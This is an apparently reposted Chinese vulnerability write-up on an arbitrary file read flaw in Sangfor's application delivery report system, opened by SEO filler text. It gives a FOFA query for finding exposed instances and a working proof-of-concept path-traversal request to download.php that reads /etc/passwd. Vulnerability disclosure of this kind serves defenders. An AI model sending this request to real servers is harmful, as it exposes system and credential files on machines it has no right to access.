龙空技术网

深信服应用交付报表任意文件读取漏洞

烦人的星辰 56

前言:

现时我们对“php周报”大概比较注重,我们都需要知道一些“php周报”的相关内容。那么小编在网络上搜集了一些对于“php周报””的相关文章,希望你们能喜欢,你们快快来学习一下吧!

1.深信服应用交付报表任意文件读取漏洞1.1.漏洞描述

  深信服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。

1.2.漏洞影响

  深信服应用交付报表系统

1.3.FOFA

  app=“SANGFOR-应用交付报表系统”

2.漏洞复现2.1.登录页面2.2.POC

  这里通过抓包进行文件读取,当然也可以在页面中直接进行获取。

POC:/report/download.php?pdf=../../../../../etc/passwd

标签: #php周报